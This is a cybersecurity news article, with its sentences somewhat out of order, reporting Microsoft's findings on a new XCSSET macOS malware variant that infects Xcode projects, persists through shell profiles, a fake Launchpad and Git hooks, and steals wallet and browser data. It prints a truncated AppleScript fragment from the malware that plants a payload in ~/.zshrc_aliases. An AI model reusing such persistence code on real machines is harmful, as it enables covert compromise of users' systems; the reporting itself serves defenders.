New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation

The malware utilizes three distinct persistence techniques, ensuring its payload launches whenever a new shell session begins, a user opens a fake Launchpad application, or a developer commits changes in Git. Microsoft recommends that users run the latest operating system versions, carefully inspect Xcode projects, and utilize security solutions like Microsoft Defender for Endpoint on Mac, which can detect and quarantine the malware variants. Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects. Following initial infection, the malware downloads additional modules from its command-and-control server (C2), including components that steal system information, browser extension data, digital wallet information, and notes from the Notes application. on doMain() try if RESTORE_DEFAULT is true then do shell script "rm -f ~/.zshrc_aliases" log ".zshrc_aliases removed" else set payload to getPayloadBody("Terminal") set payload to quoted form of payload do shell script "echo " & payload & " > ~/.zshrc_aliases" log ".zshrc_aliases updated" set payload to "[ -f $HOME/.zshrc_aliases ] && . Microsoft researchers noted that the infection chain consists of four stages, beginning with an obfuscated shell payload that runs when building an infected Xcode project. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users. The malware also infects Git repositories by modifying pre-commit hooks to execute its payload whenever developers commit changes. Another persistence technique involves creating a fake Launchpad application that executes malicious code whenever a user attempts to open the legitimate Launchpad. At the code level, the malware obfuscates module names to hinder static analysis and employs a randomized approach for generating payloads. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis.

This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 12 Mar 2025 07:45:20 +0000